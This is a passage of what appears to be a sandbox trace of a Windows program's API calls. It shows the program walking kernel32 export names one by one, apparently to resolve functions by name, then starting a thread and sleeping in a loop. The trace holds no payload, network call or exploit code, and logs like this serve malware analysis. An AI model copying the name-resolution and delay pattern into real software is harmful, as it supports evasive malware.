lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.375] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.375] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.375] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.375] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.375] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.375] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.375] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.375] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.375] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.375] lstrlenA (lpString="COPYFILEA") returned 9 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.375] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.375] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.375] lstrcpyA (in: lpString1=0x32deee0, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.375] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.376] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.376] lstrlenA (lpString="COPYFILEW") returned 9 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.376] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.376] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.376] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.376] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.376] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.376] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.376] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.376] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.376] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.376] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.376] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.376] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.376] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.376] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.376] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.376] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.376] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.377] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.377] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.377] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.377] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.377] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.377] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.377] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.377] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.377] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.377] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0178.377] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0178.377] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0178.377] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0178.377] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0178.377] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0178.377] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0178.377] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0178.377] lstrlenA (lpString="CREATEJOBSET") returned 12 [0178.377] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0178.378] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0178.378] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0178.378] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0178.378] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0178.378] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0178.378] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0178.378] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0178.378] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0178.378] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0178.378] lstrlenA (lpString="CREATEPIPE") returned 10 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0178.378] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0178.378] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0178.378] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0178.378] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0178.378] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0178.378] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0178.378] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0178.378] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0178.378] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0178.378] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0178.379] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0178.379] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0178.379] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0178.379] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0178.379] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0178.379] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0178.379] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0178.379] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0178.379] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0178.379] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0178.379] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0178.379] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0178.379] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0178.379] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0178.379] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0178.379] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0178.379] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0178.379] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0178.379] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0178.379] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0178.379] lstrcpyA (in: lpString1=0x32deee0, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0178.379] lstrlenA (lpString="CREATETHREAD") returned 12 [0178.379] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xde760, lpParameter=0x370000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0178.380] Sleep (dwMilliseconds=0x3e8) [0179.522] Sleep (dwMilliseconds=0x3e8) [0180.535] Sleep (dwMilliseconds=0x3e8) [0181.721] Sleep (dwMilliseconds=0x3e8) [0182.957] Sleep (dwMilliseconds=0x3e8) [0184.497] Sleep (dwMilliseconds=0x3e8) [0185.527] Sleep (dwMilliseconds=0x3e8) [0186.550] Sleep (dwMilliseconds=0x3e8) Thread: id = 340 os_tid = 0x304 [0178.417] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x5c0000 [0178.417] GetTickCount () returned 0x11340e7 [0178.417] lstrlenA (lpString="kernel32.dll") returned 12 [0178.417] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.417] lstrcpyA (in: lpString1=0x33eee64, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.417] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.417] lstrcpyA (in: lpString1=0x33eee64, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.417] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.417] lstrcpyA (in: lpString1=0x33eee64, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.417] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.418] lstrlenA (lpString="ADDATOMA") returned 8 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.418] lstrlenA (lpString="ADDATOMW") returned 8 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.418] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.418] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.418] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.418] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.418] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.418] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.418] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.418] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.418] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.418] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.418] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.418] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.418] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.418] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.418] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.418] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.418] lstrcpyA (in: lpString1=0x33eee64, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.419] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.419] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.419] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.419] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.419] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.419] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.419] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.419] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.419] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.419] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.419] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.419] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.419] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.419] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.419] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.419] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.419] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.419] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.419] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.419] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.420] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.420] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.420] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.420] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.420] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.420] lstrcpyA (in: lpString1=0x33eee64, 